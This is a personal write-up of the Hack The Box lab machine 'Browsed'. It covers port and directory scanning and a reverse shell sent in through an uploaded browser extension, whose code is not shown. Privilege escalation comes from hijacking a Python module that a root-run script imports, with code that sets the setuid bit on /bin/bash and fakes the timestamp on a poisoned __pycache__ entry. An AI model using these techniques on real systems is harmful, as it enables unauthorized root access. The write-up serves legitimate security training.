HTB Browsed [MEDIUM]

Machine Browsed (Active) [Medium]

lets start with an nmap scan:

1
    ❯ nmap -T4 -F -sV 10.129.3.5
2
    Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-19 23:24 +0100
3
    Nmap scan report for 10.129.3.5
4
    Host is up (0.57s latency).
5
    Not shown: 98 closed tcp ports (reset)
6
    PORT   STATE SERVICE VERSION
7
    22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
8
    80/tcp open  http    nginx 1.24.0 (Ubuntu)
9
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
10

11
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
12
    Nmap done: 1 IP address (1 host up) scanned in 14.44 seconds

alright, so a web interface and an ssh port;

lets check on the web interface:
alt text
from here we can identify 2 intresting pages :
/samples.html

and /upload.php

lets take a look at them one by one and analyze their behaviour: for /sample.html u basically dowanload extensions, lets check upload.php

what it apparently does is try the extension zip file, so we prolly can inject something in that extension file that could grant us shell or anything useful.
first of all i downloaded a sample extension to observe how it behaves : alt text
so here we got the files ,lets try top upload it and look at what it exactly outputs.
before i could do any injection, i need to find where extension processes reside when ran : \ gobuster dir -u http://10.129.3.167 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

and we got a response , /routines/ , now lets craft our malicious zip file extension: \

with the help of some ai, i found out that u only need 2 files, manifest.json which is like the id card of the extension, and background.js where we will run our reverse shell code to gain shell acess, and then we zip both of them and get shell!
reverse shell done ! :

got the user flag !\

as always , now lets look for the root :
lets check for possible priv esc vectors:

1
larry@browsed:~$ getcap -r / 2>/dev/null
2
getcap -r / 2>/dev/null
3
/usr/bin/ping cap_net_raw=ep
4
/usr/bin/mtr-packet cap_net_raw=ep
5
/usr/lib/snapd/snap-confine cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_setgid,cap_setuid,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin=p
6
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin,cap_sys_nice=ep
7
larry@browsed:~$ sudo -l
8
sudo -l
9
Matching Defaults entries for larry on browsed:
10
    env_reset, mail_badpass,
11
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
12
    use_pty
13

14
User larry may run the following commands on browsed:
15
    (root) NOPASSWD: /opt/extensiontool/extension_tool.py

alright, /opt/extensiontool/extension_tool.py seems prominent, lets check it out !

1
cat /opt/extensiontool/extension_tool.py
2
#!/usr/bin/python3.12
3
import json
4
import os
5
from argparse import ArgumentParser
6
from extension_utils import validate_manifest, clean_temp_files
7
import zipfile
8

9
EXTENSION_DIR = '/opt/extensiontool/extensions/'
10

11
def bump_version(data, path, level='patch'):
12
   version = data["version"]
13
   major, minor, patch = map(int, version.split('.'))
14
   if level == 'major':
15
       major += 1
16
       minor = patch = 0
17
   elif level == 'minor':
18
       minor += 1
19
       patch = 0
20
   else:
21
       patch += 1
22

23
   new_version = f"{major}.{minor}.{patch}"
24
   data["version"] = new_version
25

26
   with open(path, 'w', encoding='utf-8') as f:
27
       json.dump(data, f, indent=2)
28

29
   print(f"[+] Version bumped to {new_version}")
30
   return new_version
31

32
def package_extension(source_dir, output_file):
33
   temp_dir = '/opt/extensiontool/temp'
34
   if not os.path.exists(temp_dir):
35
       os.mkdir(temp_dir)
36
   output_file = os.path.basename(output_file)
37
   with zipfile.ZipFile(os.path.join(temp_dir,output_file), 'w', zipfile.ZIP_DEFLATED) as zipf:
38
       for foldername, subfolders, filenames in os.walk(source_dir):
39
           for filename in filenames:
40
               filepath = os.path.join(foldername, filename)
41
               arcname = os.path.relpath(filepath, source_dir)
42
               zipf.write(filepath, arcname)
43
   print(f"[+] Extension packaged as {temp_dir}/{output_file}")
44

45
def main():
46
   parser = ArgumentParser(description="Validate, bump version, and package a browser extension.")
47
   parser.add_argument('--ext', type=str, default='.', help='Which extension to load')
48
   parser.add_argument('--bump', choices=['major', 'minor', 'patch'], help='Version bump type')
49
   parser.add_argument('--zip', type=str, nargs='?', const='extension.zip', help='Output zip file name')
50
   parser.add_argument('--clean', action='store_true', help="Clean up temporary files after packaging")
51

52
   args = parser.parse_args()
53

54
   if args.clean:
55
       clean_temp_files(args.clean)
56

57
   args.ext = os.path.basename(args.ext)
58
   if not (args.ext in os.listdir(EXTENSION_DIR)):
59
       print(f"[X] Use one of the following extensions : {os.listdir(EXTENSION_DIR)}")
60
       exit(1)
61

62
   extension_path = os.path.join(EXTENSION_DIR, args.ext)
63
   manifest_path = os.path.join(extension_path, 'manifest.json')
64

65
   manifest_data = validate_manifest(manifest_path)
66

67
   # Possibly bump version
68
   if (args.bump):
69
       bump_version(manifest_data, manifest_path, args.bump)
70
   else:
71
       print('[-] Skipping version bumping')
72

73
   # Package the extension
74
   if (args.zip):
75
       package_extension(extension_path, args.zip)
76
   else:
77
       print('[-] Skipping packaging')
78

79

80
if __name__ == '__main__':
81
   main()

yeah so basically i was stuck here for a long time, I needed the help of an ai, and god damn how obvious it was, you only need to pull off a simple python library hijack: extension_utils , we just create a seperate ones, and the change the code for validate_manifest, clean_temp_file to something that opens a shell as a priviliged user, as easy as that, let’s take it to the test;
extension_utils.py :
```
1
    import os
2

3
    def validate_manifest(path):
4
        os.system("chmod +s /bin/bash")
5

6
    def clean_temp_files(x):
7
        pass
```

as simple as that,
now obviously we can’t just write to /opt/extensiontool/ directly, no permissions. but notice this: drwxrwxrwx 2 root root 4096 Feb 20 15:40 __pycache__

from what i read online (im still learning XD), __pycache__ is where python stores pre compiled versions of every module it imports, so if we create a custom malicious .pyc that uses the new module we created (that opens a shell), python will execute it, well it didnt work for some reason. after some looking online, I found that python has some specific rules before using the cache, first thing is that: does the timestamp of the .pyc match the source file’s last modified time, and does it match the source file’s size. we can change these, i changed the timestamps like this :

1
stat = os.stat(ORIGINAL_SRC)          # read original's timestamps
2
os.utime(MALICIOUS_SRC, (stat.st_atime, stat.st_mtime))  # stamp ours with the same values

and for the size, its much easier, u just fill it with comments until it fits, AND …
alt text
DONE !